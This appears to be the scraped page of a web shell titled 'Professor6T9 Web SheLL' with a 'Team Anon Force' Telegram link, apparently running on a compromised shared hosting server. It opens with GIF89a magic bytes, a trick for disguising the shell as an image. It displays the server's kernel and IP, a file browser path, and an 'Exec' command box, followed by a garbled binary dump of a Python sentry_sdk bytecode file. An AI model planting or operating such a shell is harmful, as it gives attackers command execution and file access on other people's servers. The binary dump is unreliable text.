GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux host69.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Apache
68.65.123.79
/
opt
/
hc_python
/
lib
/
python3.12
/
site-packages
/
sentry_sdk
/
__pycache__
[ HOME ]
Exec
Submit
sessions.cpython-312.pyc
� �0i�# � �0 � d dl Z d dlZd dlmZmZmZ d dlmZ d dlZd dl m Z d dlmZ d dl mZ d dlmZ er*d dlmZ d d lmZ d d lmZ d dlmZ d dlmZ d d lmZ d dlmZ dd�Zedd�� Zd� Zd� Zedd�� Zedd�� ZdZdZd� Z G d� d� Z!y)� N)�Thread�Lock�Event)�contextmanager)�Envelope)�Session)�format_timestamp)� TYPE_CHECKING)�Any)�Callable)�Dict)� Generator)�List)�Optional)�Unionc � � t j dt d�� | �t j j } | j j }|�6| j r| j j ni }|j dd� }|S )zHDEPRECATED: Utility function to find out if session tracking is enabled.�nThis function is deprecated and will be removed in the next major release. There is no public API replacement.� �� stacklevel�auto_session_trackingF)�warnings�warn�DeprecationWarning� sentry_sdk�Hub�current�scope�_force_auto_session_tracking�client�options�get)�hub�should_track�client_optionss �B/opt/hc_python/lib/python3.12/site-packages/sentry_sdk/sessions.py� is_auto_session_tracking_enabledr'